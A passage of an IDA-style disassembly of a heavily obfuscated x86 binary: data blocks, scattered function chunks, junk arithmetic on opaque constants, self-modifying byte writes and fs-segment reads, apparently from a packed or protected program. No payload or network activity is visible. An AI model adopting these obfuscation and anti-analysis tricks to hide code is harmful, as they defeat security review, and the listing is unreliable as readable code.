		dd 0FFFA48E8h, 49B8E9FFh, 0E9000000h, 378Ah, 0F73CE900h
					; CODE XREF: _3gijy9nr:0048C83Aj
		dd 0E900FFFFh, 0FFFFF72Ah, 53108B00h, 0A9361668h, 0C3C15B38h
		dd 49F38116h, 0E9858E2Ah, 0FFFFF743h
		db 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_558. PRESS KEYPAD	"+" TO EXPAND]
		align 4
		dd 840FC009h, 0FFFFF68Bh, 48C96868h, 35C0E900h,	0
; ---------------------------------------------------------------------------
		mov	esi, ecx
		xchg	ecx, [esp]
		pop	ecx
		add	esi, 593FA1CFh
		jmp	loc_48C7D1
; ---------------------------------------------------------------------------
		align 2

loc_4895FE:				; DATA XREF: _3gijy9nr:0048A274o
		push	61B1214Ah
		pop	esi
		add	esi, 929925C2h
		xor	esi, 27B5D5DBh
		push	edi
		jmp	loc_48CB84
; ---------------------------------------------------------------------------
		dw 6800h
; ---------------------------------------------------------------------------
		or	[ecx+0CE90048h], edi
		add	eax, 0
		sbb	ecx, 6092CA8Bh
		jmp	loc_489A1F
; ---------------------------------------------------------------------------
		align 10h
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_489630:				; CODE XREF: sub_48B609+1EFDj
		mov	edx, 48C4C1h
		jmp	loc_48DE35
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		align 4
		dd 53E9F185h, 81FFFFF1h, 31635AC3h, 0F2DBE8C6h,	0CE9FFFFh
		dd 0E9000010h, 2A8Fh, 8F5CB900h, 0D8E9B9A6h, 8100002Dh
		dd 85860C1h, 0E0E8517Ch, 33h, 68F18B56h, 48A3F3h, 1361E9h
		dd 33E80000h, 11h, 0FFFBFDE9h, 810000FFh, 19EE1EC7h, 148CE913h
		dd 0
; ---------------------------------------------------------------------------
		push	ecx
		mov	ecx, offset loc_48BC7A
		jmp	loc_48BC3A
; ---------------------------------------------------------------------------
		pushf
		push	offset loc_489804
		jmp	locret_4897F8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_4896AE:				; CODE XREF: sub_48B609:loc_48A834j
					; sub_48CDDE+Aj
		jnp	loc_48924B
		sbb	ebx, edi
		jmp	loc_488D95
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		align 4
		dd 26F1E8h, 96E90000h, 0E9000028h, 0FFFFF9DEh, 0E65850Fh
		dd 0B0E90000h, 20h, 83EFD68h, 3C3EE9E2h, 0
; ---------------------------------------------------------------------------

loc_4896E4:				; CODE XREF: _3gijy9nr:0048A6BCj
		jnb	loc_48B909
		jnp	loc_48BD80

; =============== S U B	R O U T	I N E =======================================



sub_4896F0	proc near		; CODE XREF: _3gijy9nr:0048A4F6j
					; sub_48A928+3p

; FUNCTION CHUNK AT 004897FF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048AC1F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048CF17 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0048DFB7 SIZE 0000000B BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		pop	esi
		pop	ebx
		jmp	loc_4897FF
sub_4896F0	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		db 52h
		dd 0DDC78E68h, 0F2815A41h, 0EF7F2B42h, 0FFF7D7E9h, 0B1C081FFh
		dd 30FDA36h, 87C081C5h,	68F025B8h, 48A0C8h, 9A0E9h
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_489726:				; CODE XREF: _3gijy9nr:loc_48B08Aj
		mov	ebx, ebp
		pop	ebp
		jmp	loc_489EFF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48972E:				; CODE XREF: sub_48B609+12C5j
		call	sub_48D1F6

loc_489733:				; CODE XREF: sub_48B609+1CF5j
		push	488EBCh
		jmp	loc_48CBF8
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		align 2
		add	ebp, 7C9C690h
		mov	[ebp+0], ebx
		jmp	sub_488830
; ---------------------------------------------------------------------------
		dd 11C08100h, 0E8973047h, 0FFFFFDE7h, 0FFF84AE8h
					; CODE XREF: sub_48AE28:loc_48AD6Ej
		db 0FFh
; ---------------------------------------------------------------------------

loc_48975D:				; DATA XREF: sub_48B609+310o
		pop	esi
		push	offset byte_48C3ED
		jmp	loc_48D3E0
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
		align 2

loc_48976A:				; CODE XREF: _3gijy9nr:0048901Bj
		jmp	loc_48B1AB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48D6DF

loc_48976F:				; CODE XREF: sub_48D6DF-374Aj
		shl	esi, 16h

loc_489772:				; CODE XREF: sub_48D6DF:loc_489F8Dj
		add	eax, 689262C6h
		push	edi
		mov	edi, offset loc_488A5F
		jmp	loc_48B0DE
; END OF FUNCTION CHUNK	FOR sub_48D6DF
; ---------------------------------------------------------------------------
		xchg	eax, [esp]
		pop	eax
		xchg	ebx, [esp]
		push	offset byte_48C4EF
		jmp	locret_48C03D
; ---------------------------------------------------------------------------

loc_489794:				; DATA XREF: _3gijy9nr:0048D9FDo
		jmp	loc_48AD6A
; ---------------------------------------------------------------------------
		align 2
		jmp	loc_48A51B
; ---------------------------------------------------------------------------
		push	esi
		mov	esi, edi
		xchg	esi, [esp]
		mov	edi, offset loc_489516
		jmp	loc_488F60
; ---------------------------------------------------------------------------
		align 10h

loc_4897B0:				; CODE XREF: _3gijy9nr:0048D659j
		rol	ecx, 0Bh
		sub	ecx, 0B812BC3Dh
		add	ecx, 880499F4h
		add	eax, ecx
		jmp	loc_48BADD
; ---------------------------------------------------------------------------
		jl	loc_48DD81
		pushf
		add	edx, ecx
		test	ecx, ebx
		jmp	loc_48DBDD
; ---------------------------------------------------------------------------
		dw 0E800h		; CODE XREF: _3gijy9nr:0048B47Cj
		dd 308Ch, 0C30000h
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_488830

loc_4897E0:				; CODE XREF: sub_488830+10j
		jmp	loc_48DD8F
; END OF FUNCTION CHUNK	FOR sub_488830
; ---------------------------------------------------------------------------
		align 2

loc_4897E6:				; CODE XREF: _3gijy9nr:loc_48C702j
		call	loc_48B635

loc_4897EB:				; CODE XREF: _3gijy9nr:0048B4BDj
		jmp	loc_4898AD
; ---------------------------------------------------------------------------
		dd 96EE900h, 0
; ---------------------------------------------------------------------------

locret_4897F8:				; CODE XREF: _3gijy9nr:004896A9j
		retn
; ---------------------------------------------------------------------------
		jmp	locret_48CCCC
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4896F0

loc_4897FF:				; CODE XREF: sub_4896F0+6j
		jmp	loc_48DFB7
; END OF FUNCTION CHUNK	FOR sub_4896F0
; ---------------------------------------------------------------------------

loc_489804:				; DATA XREF: _3gijy9nr:004896A4o
		push	edi
		mov	edi, offset loc_48ACC2
		jmp	loc_48ACAB
; ---------------------------------------------------------------------------
		db 0Fh
		dd 0FFF21E85h, 0C5F700FFh, 81BC8E17h, 0FFF204E9h, 810000FFh
		dd 43F87FDDh, 3BEAE900h, 0E8000000h, 9,	2E900C3h, 14h
		dd 0C6BF5700h, 0E90048B6h, 2D96h, 92680000h, 58B90E01h
		dd 9C35E881h, 0F081821Fh, 71A2508Dh, 598C881h, 0E0810D7Ah
		dd 0B1C22407h, 48B12A68h, 391BE900h, 81000000h,	0FB1F61D5h
		db 8Ch

; =============== S U B	R O U T	I N E =======================================



sub_489879	proc near		; CODE XREF: sub_48B609:loc_48DC9Fp

; FUNCTION CHUNK AT 0048D268 SIZE 0000000C BYTES

		xchg	eax, [esp+0]
		pop	eax
		add	esi, ebp
		add	esi, 0DF13E93Fh
		jmp	loc_48D268
sub_489879	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		test	edx, 521BD1F9h
		jmp	loc_48C862
; ---------------------------------------------------------------------------
		db 2 dup(0), 0Fh
		dd 2DAC8Dh
		db 0
; ---------------------------------------------------------------------------

loc_48989D:				; CODE XREF: _3gijy9nr:0048CC9Ej
		jmp	near ptr dword_48893C+99h
; ---------------------------------------------------------------------------
		push	0D04E235h
		jmp	loc_48C63A
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

loc_4898AD:				; CODE XREF: _3gijy9nr:loc_4897EBj
		add	ebx, 38897649h
		add	ecx, ebx
		pop	ebx
		mov	ecx, [ecx]
		jmp	loc_48D2D2
; ---------------------------------------------------------------------------
		sub	edi, 0F07596h
		jmp	sub_48AE28
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_4898CA:				; DATA XREF: sub_48B609-2315o
		or	edx, edx
		jz	loc_48C68E
		jmp	loc_48A114
; ---------------------------------------------------------------------------

loc_4898D7:				; CODE XREF: sub_48B609-66Fp
		xchg	edx, [esp]
		pop	edx
		add	edx, 4C540A7Ah
		xchg	edx, [esp]
		cmp	al, 15h
		rcl	al, 45h
		add	[eax-2Dh], ch
		mov	al, 48h
		add	cl, ch
		xchg	eax, ebp
		inc	ebp
; ---------------------------------------------------------------------------
		dw 0
		db  0Fh
		db  8Ah	; Š
		db  76h	; v
		db  28h	; (
		db    0
		db    0
unk_4898FA	db  87h	; ‡		; CODE XREF: _3gijy9nr:00488A6Cp
		db  14h
		db  24h	; $
		db  5Ah	; Z
		db  87h	; ‡
		db  0Ch
		db  24h	; $
		db 0E9h	; é
		db  38h	; 8
		db 0F7h	; ÷
		db 2 dup(0FFh)
; ---------------------------------------------------------------------------

loc_489906:				; CODE XREF: _3gijy9nr:00489091j
		call	loc_48A427
; ---------------------------------------------------------------------------
		db 0
		dd 241C8700h, 840F5E5Bh, 35FFh,	20B2E8h, 0E9000000h, 0AF6h
; ---------------------------------------------------------------------------
		popf

loc_489925:				; DATA XREF: _3gijy9nr:0048951Do
		stc
		adc	al, 24h
		jmp	loc_488B12
; ---------------------------------------------------------------------------
		db 0E9h, 53h, 0F4h
		db 2 dup(0FFh)
; ---------------------------------------------------------------------------

loc_489932:				; CODE XREF: _3gijy9nr:loc_48A51Bj
		jnb	loc_48BF32
		jno	loc_48A1F0
		jmp	loc_48C17C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_489943:				; CODE XREF: sub_48B609-630j
		xchg	eax, [edx]

loc_489945:				; CODE XREF: sub_48B609:loc_48AFCCj
		push	edi
		mov	edi, offset loc_48DE15
		jmp	loc_48BB3E
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		add	esi, ebp
		push	edi
		push	90757B26h
		pop	edi
		sub	edi, 6A9338ABh
		add	edi, 0F45394EBh
		sub	edi, 153721A0h
		rol	edi, 1Eh
		jmp	loc_48B068
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_555. PRESS KEYPAD	"+" TO EXPAND]
		dd 72E90000h, 0C6000001h, 815E8706h, 0C2F4A7C1h, 240C8001h
					; CODE XREF: _3gijy9nr:0048DE70j
		dd 3360E9h, 8D000000h, 489D7005h, 0C1A46800h, 0FFE90048h
		dd 0E9000027h, 0FA3h, 34870000h, 87CE8B24h, 2E92404h, 0Bh
		dd 0EF870F00h, 0E900000Eh, 0FFFFFDC3h, 8C0F00h,	81000018h
		dd 0F50861E7h, 0E97E9AAh, 68000000h, 489406h, 2621E9h
		dd 87000000h, 50582404h, 0CF5C8B68h, 38B6E9CDh,	0F000000h
		dd 21668Eh, 240C8700h, 243C8759h, 1496E9h, 53000000h, 0F877D68h
		dd 243C8742h, 0E95FDF8Bh, 3C7Fh, 0C30000h, 2904E900h
		db 3 dup(0)
; ---------------------------------------------------------------------------

loc_489A1F:				; CODE XREF: _3gijy9nr:00489629j
		sub	ebp, ecx

; =============== S U B	R O U T	I N E =======================================



sub_489A21	proc near		; CODE XREF: _3gijy9nr:0048AD36p
					; sub_48B609+5D5j
		xchg	eax, [esp+0]
		pop	eax
		add	eax, 0DAB783D5h
		mov	eax, [eax]
		push	offset dword_48A624
		jmp	nullsub_584
sub_489A21	endp

; ---------------------------------------------------------------------------

loc_489A37:				; DATA XREF: _3gijy9nr:loc_48CA43o
		push	esi
		mov	esi, offset loc_48A6F2
		jmp	loc_48BE93
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_489A43:				; CODE XREF: sub_48B609+278j
		push	offset byte_48D0F7
		jmp	loc_48BFCA
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		align 2
		dw 880Fh
		dd 122Fh, 0FFF594E9h, 819C00FFh, 0D910CFE1h, 7D8B28h, 0CB81F787h
		dd 0A82BE7D7h, 0B7A3C381h, 0FDE853D8h, 3000014h, 0E830FEBh
		dd 0E900001Ah, 3B4Bh, 811CC3C1h, 0FCF9F7E3h, 79EB81ADh
		dd 81B7D183h, 81652AC3h, 0F770E9AAh, 0FFFFh
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_586. PRESS KEYPAD	"+" TO EXPAND]
		align 2

loc_489AA2:				; CODE XREF: _3gijy9nr:0048C18Ej
		jmp	loc_48B095
; ---------------------------------------------------------------------------
		align 4

loc_489AA8:				; CODE XREF: _3gijy9nr:0048A033j
		jmp	loc_48D729
; ---------------------------------------------------------------------------
		db 2 dup(0), 0E9h
		dd 17B7h, 0BEC08100h, 682DD257h, 48B13Ah, 0FFFB8EE9h
					; CODE XREF: sub_48B609:loc_48B902j
		db 0FFh, 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_489AC7:				; CODE XREF: sub_48B609:loc_48BFC3j
		or	esi, 6D2F7ACDh
		push	eax
		push	5FA7C61Fh
		pop	eax
		and	eax, 0A4EB5EF0h
		add	eax, 0CB982F0Eh
		and	eax, 944A0EEAh
		jmp	loc_48C941
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		align 4
		dd 0E900C300h, 0FFFFF13Dh, 24348700h, 48C28468h, 1836E900h
					; CODE XREF: sub_48B609+73j
		dd 0F000000h, 3EB583h, 240C8700h, 58B6459h, 30h, 87FA8B57h
		dd 0BA68243Ch, 0E9254689h, 2ED9h, 0E900C300h, 232Fh, 2E82E900h
		dd 7C60000h, 0E9595FC3h, 2540h,	0D1F79C00h, 82E9C61Bh
		db 27h,	2 dup(0)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_560. PRESS KEYPAD	"+" TO EXPAND]
		dd 0CDE90000h, 57FFFFEFh, 3C87F98Bh, 0D9F3B924h, 0E1E90048h
		dd 2Ch

; =============== S U B	R O U T	I N E =======================================



sub_489B60	proc near		; CODE XREF: sub_48CEEE:loc_48CAFFp

arg_2E920	= byte ptr  2E924h

; FUNCTION CHUNK AT 00489556 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00489584 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0048B104 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0048DE3A SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		xor	eax, 24410400h
		push	eax
		jmp	loc_489556
sub_489B60	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		dd 0E9FC0000h, 2D56h, 8B560000h, 0DF0668F1h, 0C0E90048h
					; CODE XREF: sub_48B609+1C5Aj
		dd 0Ch,	870F01C6h, 0CF8B243Ch, 8E5A685Fh, 0DDE90048h, 34h
		dd 0F0000C3h, 31D689h, 29F68100h, 0E900F1CAh, 1AECh, 840F0000h
		dd 2711h, 0FFFF80E9h
; ---------------------------------------------------------------------------
		inc	dword ptr [eax]

loc_489BBE:				; CODE XREF: _3gijy9nr:loc_48A9D2j
		or	eax, 0D4B06075h
		add	eax, 2351EF27h
		push	ecx
		push	eax
		pop	ecx
		fisttp	word ptr [esp]
		jmp	loc_489045
; ---------------------------------------------------------------------------
		db 2 dup(0)
byte_489BD7	db 81h			; DATA XREF: _3gijy9nr:0048A0F7o
		dd 0BA126CF2h, 81D503BBh, 8DBF96C2h, 8EFE849h, 0
		dd 8E45F681h, 0E0E968B7h, 0FFFFFCh, 0EE9D587h, 99FFFFFDh
		dd 8D1E9h, 0E7C10000h, 1A25E905h, 0F000000h, 6F38Dh, 0E9F83B00h
		dd 2453h
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48CEEE

loc_489C1E:				; CODE XREF: sub_48CEEE:loc_48A967j
		pop	ebx
		push	esi
		mov	esi, offset loc_48955B
		mov	byte ptr [esi],	9Ch
		pop	esi
		and	eax, 644B4D77h
		test	eax, 40000h
		jmp	loc_48AFB3
; END OF FUNCTION CHUNK	FOR sub_48CEEE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_489C3A:				; CODE XREF: sub_48B609:loc_48B8B1j
		mov	byte ptr [edx],	0Fh
		pop	edx
		mov	eax, large fs:20h
		or	eax, eax
		push	cs
		test	[ebp+3Dh], ah
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		db 0
		db    0
		db 0E9h	; é
		db  94h	; ”
		db  2Dh	; -
		db    0
		db    0
		db 0E9h	; é
		db 0F2h	; ò
		db  3Dh	; =
		db    0
		db    0
		db    0
		db    5
		db    0
		db 0E9h	; é
		db  48h	; H
		db    7
		db    0
		db    0
		db    0
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48D2DE

loc_489C61:				; CODE XREF: sub_48D2DE:loc_48A915j
		push	edx
		push	offset loc_48AAFC
		jmp	loc_48BDEB
; END OF FUNCTION CHUNK	FOR sub_48D2DE
; ---------------------------------------------------------------------------
		xchg	ebx, [esp]
		pop	ebx
		push	ebx
		push	edi
		mov	edi, eax
		xchg	edi, [esp]
		jmp	loc_48C5B0
; ---------------------------------------------------------------------------
		dd 8B640000h, 3005h, 0E8535100h, 0FFFFEBE3h, 0D90B0000h
		dd 0E903E0C1h, 3AC5h
		db 0

; =============== S U B	R O U T	I N E =======================================



sub_489C99	proc near		; CODE XREF: _3gijy9nr:0048A509j
					; sub_48D4C3:loc_48C8E3p
		xchg	ecx, [esp+0]
		pop	ecx
		push	ebx
		pushf
		push	437E0B08h
		pop	ebx
		add	ebx, 6B1C8FB0h
		jmp	loc_48B6EC
sub_489C99	endp

; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_489CB2:				; CODE XREF: sub_48B609-388j
		pushf
		add	eax, 5FE52FC0h
		add	eax, 0A01AD058h
		mov	eax, [eax]
		popf
		jmp	loc_48D8DF
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		align 4
		dd 0EBC78100h, 811EC09Eh, 3D5C0BCFh, 42C781DBh,	0E904C941h
		dd 2EEFh, 0E352CA81h, 87E91266h, 25h, 0BAC86800h, 4FE90048h
		dd 8700001Fh, 81582404h, 0BDDDFDF6h, 5EC69BEDh,	13EF840Fh
		dd 0F8E90000h, 14h, 0EFBCE800h
		db 2 dup(0FFh)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48D530

loc_489D16:				; CODE XREF: sub_48D530+Fj
		pop	edi
		or	edi, 4060BC5Ah
		xor	edi, 0D6FB5C85h
		add	edi, ebp
		jmp	loc_48D072
; END OF FUNCTION CHUNK	FOR sub_48D530
; ---------------------------------------------------------------------------
		align 4
		jl	loc_48BB47
		sbb	ebx, 9859B37Ah
		xor	eax, ebx
		jmp	loc_48D117
; ---------------------------------------------------------------------------
		align 10h
		dd 8100C300h, 6D99C6h, 0C6859D2Ch, 48C30968h, 2826E900h
		dd 0
; ---------------------------------------------------------------------------
		push	0FE7EB54Eh
		pop	ebx
		sub	ebx, 4EE1E63Ah
		add	ebx, 50AC05A7h
		jmp	loc_48D4B1
; ---------------------------------------------------------------------------
		align 10h

loc_489D70:				; DATA XREF: _3gijy9nr:0048CA17w
		push	offset byte_48CB9C

loc_489D75:				; DATA XREF: _3gijy9nr:0048CA1Ew
		jmp	loc_48B782
; ---------------------------------------------------------------------------
		align 4
		shr	edx, 7
		jmp	sub_48C3B4
; ---------------------------------------------------------------------------
		dd 5F8B07C6h, 7651689Ch, 815990EDh, 693F56E1h, 0C9E9813Dh
		dd 0E9A4FD08h, 0FFFFF560h, 0BCFA8151h, 0E919B246h, 0FFFFEE6Ah
		db 2 dup(0)
word_489DAE	dw 890Fh		; DATA XREF: sub_488E43:loc_488B12o
		dd 32Ch, 57DD8B53h, 48AA2FBFh, 0FF4FE900h, 0FFFFh, 0A38F181h
		dd 0C981622Dh, 5FA52031h, 0D91DC181h, 0F7E92050h, 26h
		dd 58B6400h, 30h, 8616857h, 815F8931h, 8E94AFE7h, 132DE911h
		dd 0
; ---------------------------------------------------------------------------

locret_489DF8:				; CODE XREF: _3gijy9nr:0048A940j
		retn
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_488830

loc_489DFB:				; CODE XREF: sub_488830+5563j
		jmp	loc_48C5E4
; END OF FUNCTION CHUNK	FOR sub_488830
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A74C

loc_489E02:				; CODE XREF: sub_48A74C+Cj
		pop	edi
		call	near ptr dword_488FA0+31h

loc_489E08:				; CODE XREF: _3gijy9nr:0048CB1Aj
		jmp	nullsub_564
; END OF FUNCTION CHUNK	FOR sub_48A74C
; ---------------------------------------------------------------------------
		db 2 dup(0), 0C6h
; ---------------------------------------------------------------------------
		pop	es
		retn
; ---------------------------------------------------------------------------
		xchg	ebp, [esp]
		mov	edi, ebp
		pop	ebp
		sub	esi, 0EBB132C2h
		rol	esi, 2
		jmp	loc_48CF11
; ---------------------------------------------------------------------------
		dw 8100h
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
		db 0D0h, 0FCh, 0F6h
		dd 1A3EE900h, 0C2890000h, 0CB36852h, 3C87CEE5h,	5FD78B24h
		dd 64CEC281h, 0CA816F4Eh, 0CB550AD5h, 9B6E9h, 20E80000h
		dd 0FFFFF3h, 48974D68h,	3561E900h, 87000000h, 2C872434h
		dd 5DF58B24h, 9389C081h, 0C0092FCFh, 0EDF1840Fh, 94E9FFFFh
		db 0Ch,	2 dup(0)
; ---------------------------------------------------------------------------

loc_489E7F:				; CODE XREF: _3gijy9nr:00488882j
		xor	ebx, 978A57BBh
		sub	ebx, 7FA3818Bh
		add	ebx, 0E05D9B70h
		jmp	loc_48D644
; ---------------------------------------------------------------------------
		mov	esi, 94DDACACh

; =============== S U B	R O U T	I N E =======================================



sub_489E9B	proc near		; CODE XREF: sub_48B609:loc_48B6D0p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0048D8C6 SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		mov	byte ptr [ecx],	87h
		xchg	ebp, [esp-4+arg_0]
		jmp	loc_48D8C6
sub_489E9B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_489EAB:				; CODE XREF: sub_48B609:loc_48CCCFj
		jz	loc_48A266
		push	8B2BD8ECh
		and	ebx, 64C2A887h
		jmp	loc_48A25F
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		db 2 dup(0), 0C6h
		dd 87588B00h, 0EC8B2434h, 48A10168h, 1546E900h
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48D530

loc_489ED6:				; CODE XREF: sub_48D530:loc_48D072j
		add	edi, 786A1C79h
		mov	[edi], eax
		pop	edi
		push	48C4B2D7h
		pop	eax
		jmp	loc_48AECB
; END OF FUNCTION CHUNK	FOR sub_48D530
; ---------------------------------------------------------------------------
		align 4
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_489EEC:				; CODE XREF: sub_48B609+1C0j
		push	offset byte_48CE37
		jmp	nullsub_587
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		db 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_574. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_489EF8:				; CODE XREF: sub_48B609+923j
		jmp	loc_48C6D5
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_489EFF:				; CODE XREF: _3gijy9nr:00489729j
		jmp	loc_48A3C0
; ---------------------------------------------------------------------------
		dd 64E08100h, 0C14B0FD5h, 0C8811DC0h, 0D4B06075h, 0EF27C081h
		dd 57E92351h, 3Eh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_489F20:				; CODE XREF: sub_48B609+A2j
		mov	byte ptr [esi],	0FFh
		pop	esi
		add	edi, 99099A71h
		add	byte ptr [edi+36E9243Ch], 31h
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		db 3 dup(0)
		dd 63D08100h, 0E997C76Ch, 1857h, 15118F0Fh, 0E0C10000h
		dd 3830F1Dh, 0F7000012h, 0CF2D7BC6h, 5D7E9C4h, 81000000h
		dd 0F04F6C8h, 6E890F4Dh, 30h
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_489F69:				; CODE XREF: sub_48B609-23BCj
		jmp	loc_489419
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		dw 8100h
; ---------------------------------------------------------------------------
		retn	0B51Eh
; ---------------------------------------------------------------------------
		xchg	eax, esi
		pusha
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_489F75:				; CODE XREF: sub_48B609+5C2j
		jge	loc_48D898
		jmp	loc_48B14C
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		dd 94E06800h, 97E90048h, 6
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48D6DF

loc_489F8D:				; CODE XREF: sub_48D6DF+15j
		jnz	loc_489772
		xchg	ebp, edx
		jmp	loc_48976F
; END OF FUNCTION CHUNK	FOR sub_48D6DF
; ---------------------------------------------------------------------------
		xor	ecx, esi
		jmp	sub_48A05F
; ---------------------------------------------------------------------------
		align 2

locret_489FA2:				; CODE XREF: _3gijy9nr:0048907Bj
		retn
; ---------------------------------------------------------------------------
		align 4
		dd 0EB68E900h, 0FFFFh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_489FAC:				; CODE XREF: sub_48B609+11EAj
		jge	loc_48C257

loc_489FB2:				; CODE XREF: _3gijy9nr:0048D156j
		jmp	loc_48BC8D
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		align 4
		push	0BB183AECh
		shl	eax, 17h
		test	edx, 458437ACh
		jmp	loc_48C804
; ---------------------------------------------------------------------------
		align 4
		push	489A03h
		jmp	locret_48AB2F
; ---------------------------------------------------------------------------
		mov	esi, 6A3D998Ah
		jmp	loc_48DB44
; ---------------------------------------------------------------------------
		dd 24348700h, 0E468535Eh, 0E90048AAh, 2D85h
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B5AE

loc_489FF2:				; CODE XREF: sub_48B5AE-2616j
		mov	byte ptr [ecx],	87h
		pop	ecx
		add	ecx, 964535A7h
		add	eax, ecx
		push	offset loc_48A27F
		jmp	loc_48B085
; END OF FUNCTION CHUNK	FOR sub_48B5AE
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48A00A:				; DATA XREF: sub_48CF4Eo
		xchg	ecx, [esp]
		xchg	ebp, [esp]
		mov	ecx, ebp
		pop	ebp
		jmp	loc_48BA73
; ---------------------------------------------------------------------------
		push	76841DD7h
		pop	edx
		add	edx, 974FD8F2h
		rol	edx, 7
		and	edx, 391AA926h
		add	edx, 0D72E9542h
		jmp	loc_489AA8
; ---------------------------------------------------------------------------
		dd 8B560000h, 243487F5h, 0E957EC8Bh, 0FFFFEC57h, 850F0000h
		dd 0FFFFFA16h, 0C9C10000h, 0FA00E907h, 0FFFFh
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
		db 2 dup(0)

; =============== S U B	R O U T	I N E =======================================



sub_48A05F	proc near		; CODE XREF: _3gijy9nr:00489F9Cj
					; sub_48B609-8E3p
		xchg	eax, [esp+0]
		pop	eax
		push	edi
		mov	edi, eax
		push	offset loc_48D7D6
		jmp	nullsub_574
sub_48A05F	endp

; ---------------------------------------------------------------------------

loc_48A070:				; CODE XREF: _3gijy9nr:0048B077j
		pushf
		push	8506B03Ah
		pop	edi
		sub	edi, 69014DA4h
		jnz	loc_48D5DC
		add	[edi], cl
		adc	byte ptr [eax],	0F1h
; ---------------------------------------------------------------------------
		dd 0FA3BFFFFh, 3545E9h
		db 0
; ---------------------------------------------------------------------------

loc_48A091:				; CODE XREF: _3gijy9nr:00488F48j
		popf

loc_48A092:				; CODE XREF: _3gijy9nr:loc_48DC81p
		call	sub_48CA72
; ---------------------------------------------------------------------------
		db 0
		dd 240C8700h, 24148759h, 0D2E900C3h, 8,	0F595E900h, 2D68FFFFh
					; CODE XREF: sub_48B609+1AB8j
